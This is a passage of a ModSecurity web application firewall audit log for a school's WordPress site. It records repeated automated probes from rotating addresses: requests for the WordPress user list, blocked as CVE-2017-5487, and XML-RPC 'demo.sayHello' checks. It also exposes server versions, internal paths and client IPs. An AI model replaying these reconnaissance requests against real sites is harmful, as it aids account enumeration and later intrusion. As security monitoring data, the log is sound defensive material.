4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747496397143194 3480 (- - -) Stopwatch2: 1747496397143194 3480; combined=1475, p1=478, p2=960, p3=0, p4=0, p5=37, sr=75, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --8308e025-Z-- --4d59a811-A-- [17/May/2025:22:40:05 +0700] aCit1QTOsBn9MSWb6WLRXgAAAJE 103.236.140.4 38894 103.236.140.4 8181 --4d59a811-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.125.155 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.125.155 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --4d59a811-C-- demo.sayHello --4d59a811-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --4d59a811-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747496405227054 5563 (- - -) Stopwatch2: 1747496405227054 5563; combined=4111, p1=543, p2=3343, p3=31, p4=36, p5=93, sr=75, sw=65, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --4d59a811-Z-- --b0c5ee69-A-- [17/May/2025:22:40:36 +0700] aCit9Om4kjNN-hEbWjKhJQAAAFg 103.236.140.4 39218 103.236.140.4 8181 --b0c5ee69-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.185.13 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.185.13 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --b0c5ee69-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --b0c5ee69-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747496436916383 2734 (- - -) Stopwatch2: 1747496436916383 2734; combined=1237, p1=430, p2=777, p3=0, p4=0, p5=29, sr=87, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b0c5ee69-Z-- --798a1b26-A-- [17/May/2025:22:40:46 +0700] aCit_gTOsBn9MSWb6WLRdgAAAIQ 103.236.140.4 39358 103.236.140.4 8181 --798a1b26-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.185.13 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.185.13 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --798a1b26-C-- demo.sayHello --798a1b26-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --798a1b26-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747496446969498 5629 (- - -) Stopwatch2: 1747496446969498 5629; combined=4184, p1=529, p2=3426, p3=32, p4=36, p5=95, sr=77, sw=66, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --798a1b26-Z-- --a88f1d5e-A-- [17/May/2025:22:42:48 +0700] aCiueHyxdQCiyU1ENFegdgAAAAk 103.236.140.4 40574 103.236.140.4 8181 --a88f1d5e-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.233.86.191 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.86.191 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --a88f1d5e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --a88f1d5e-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747496568952602 2765 (- - -) Stopwatch2: 1747496568952602 2765; combined=1262, p1=409, p2=823, p3=0, p4=0, p5=30, sr=73, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a88f1d5e-Z-- --4f35f677-A-- [17/May/2025:22:42:50 +0700] aCiuenyxdQCiyU1ENFegeQAAABY 103.236.140.4 40584 103.236.140.4 8181 --4f35f677-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.253.173.230 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.253.173.230 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --4f35f677-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --4f35f677-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747496570243181 2766 (- - -) Stopwatch2: 1747496570243181 2766; combined=1233, p1=413, p2=791, p3=0, p4=0, p5=29, sr=71, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --4f35f677-Z-- --cff9b97b-A-- [17/May/2025:22:42:56 +0700] aCiugBKi5m5upc8uMd4XtgAAAMU 103.236.140.4 40678 103.236.140.4 8181 --cff9b97b-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.233.86.191 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.86.191 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --cff9b97b-C-- demo.sayHello --cff9b97b-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --cff9b97b-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747496576469664 5462 (- - -) Stopwatch2: 1747496576469664 5462; combined=4184, p1=591, p2=3380, p3=31, p4=35, p5=87, sr=74, sw=60, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --cff9b97b-Z-- --5dbf5778-A-- [17/May/2025:22:42:58 +0700] aCiugnyxdQCiyU1ENFegjgAAABU 103.236.140.4 40708 103.236.140.4 8181 --5dbf5778-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.253.173.230 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.253.173.230 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --5dbf5778-C-- demo.sayHello --5dbf5778-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --5dbf5778-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747496578507800 5756 (- - -) Stopwatch2: 1747496578507800 5756; combined=4201, p1=547, p2=3429, p3=33, p4=36, p5=93, sr=80, sw=63, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --5dbf5778-Z-- --2776016b-A-- [17/May/2025:22:43:40 +0700] aCiurHyxdQCiyU1ENFegqAAAABU 103.236.140.4 41038 103.236.140.4 8181 --2776016b-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 154.214.1.200 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.214.1.200 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --2776016b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --2776016b-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747496620756734 2827 (- - -) Stopwatch2: 1747496620756734 2827; combined=1231, p1=443, p2=760, p3=0, p4=0, p5=28, sr=78, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --2776016b-Z-- --a9355c1c-A-- [17/May/2025:22:43:48 +0700] aCiutHyxdQCiyU1ENFegrQAAAAg 103.236.140.4 41074 103.236.140.4 8181 --a9355c1c-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 154.214.1.200 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.214.1.200 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --a9355c1c-C-- demo.sayHello --a9355c1c-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --a9355c1c-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747496628962781 5491 (- - -) Stopwatch2: 1747496628962781 5491; combined=3995, p1=540, p2=3240, p3=29, p4=31, p5=92, sr=70, sw=63, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a9355c1c-Z-- --03b11166-A-- [17/May/2025:22:44:05 +0700] aCiuxXyxdQCiyU1ENFegtgAAABU 103.236.140.4 41106 103.236.140.4 8181 --03b11166-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.90.198 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.90.198 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --03b11166-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --03b11166-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747496645054030 2860 (- - -) Stopwatch2: 1747496645054030 2860; combined=1294, p1=435, p2=830, p3=0, p4=0, p5=29, sr=73, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --03b11166-Z-- --3370cb05-A-- [17/May/2025:22:44:12 +0700] aCiuzHyxdQCiyU1ENFeguQAAABc 103.236.140.4 41112 103.236.140.4 8181 --3370cb05-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.90.198 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.90.198 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --3370cb05-C-- demo.sayHello --3370cb05-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --3370cb05-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747496652387212 6003 (- - -) Stopwatch2: 1747496652387212 6003; combined=4407, p1=570, p2=3611, p3=35, p4=35, p5=93, sr=81, sw=63, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --3370cb05-Z-- --80cced0a-A-- [17/May/2025:22:44:14 +0700] aCiuznyxdQCiyU1ENFegugAAAAk 103.236.140.4 41114 103.236.140.4 8181 --80cced0a-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.253.166.145 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.253.166.145 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --80cced0a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --80cced0a-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747496654326163 2669 (- - -) Stopwatch2: 1747496654326163 2669; combined=1264, p1=435, p2=791, p3=0, p4=0, p5=38, sr=82, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --80cced0a-Z-- --68e2d52c-A-- [17/May/2025:22:44:20 +0700] aCiu1HyxdQCiyU1ENFegwAAAAA0 103.236.140.4 41136 103.236.140.4 8181 --68e2d52c-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.253.166.145 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.253.166.145 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --68e2d52c-C-- demo.sayHello --68e2d52c-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --68e2d52c-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747496660798105 5943 (- - -) Stopwatch2: 1747496660798105 5943; combined=4388, p1=541, p2=3619, p3=34, p4=36, p5=94, sr=73, sw=64, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --68e2d52c-Z-- --640ead13-A-- [17/May/2025:22:45:02 +0700] aCiu_nyxdQCiyU1ENFeg8wAAAA4 103.236.140.4 41500 103.236.140.4 8181 --640ead13-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 154.213.199.165 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.199.165 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --640ead13-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --640ead13-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747496702168126 2730 (- - -) Stopwatch2: 1747496702168126 2730; combined=1212, p1=453, p2=731, p3=0, p4=0, p5=28, sr=71, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --640ead13-Z-- --86f52f20-A-- [17/May/2025:22:45:12 +0700] aCivCHyxdQCiyU1ENFehBQAAAAQ 103.236.140.4 41584 103.236.140.4 8181 --86f52f20-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 154.213.199.165 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.199.165 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --86f52f20-C-- demo.sayHello --86f52f20-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --86f52f20-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747496712109185 5571 (- - -) Stopwatch2: 1747496712109185 5571; combined=4113, p1=521, p2=3352, p3=45, p4=36, p5=94, sr=75, sw=65, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --86f52f20-Z-- --1377af2e-A-- [17/May/2025:22:45:13 +0700] aCivCem4kjNN-hEbWjKhZAAAAFg 103.236.140.4 41598 103.236.140.4 8181 --1377af2e-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.242.42.15 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.242.42.15 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --1377af2e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --1377af2e-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747496713676994 2771 (- - -) Stopwatch2: 1747496713676994 2771; combined=1251, p1=446, p2=775, p3=0, p4=0, p5=30, sr=99, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
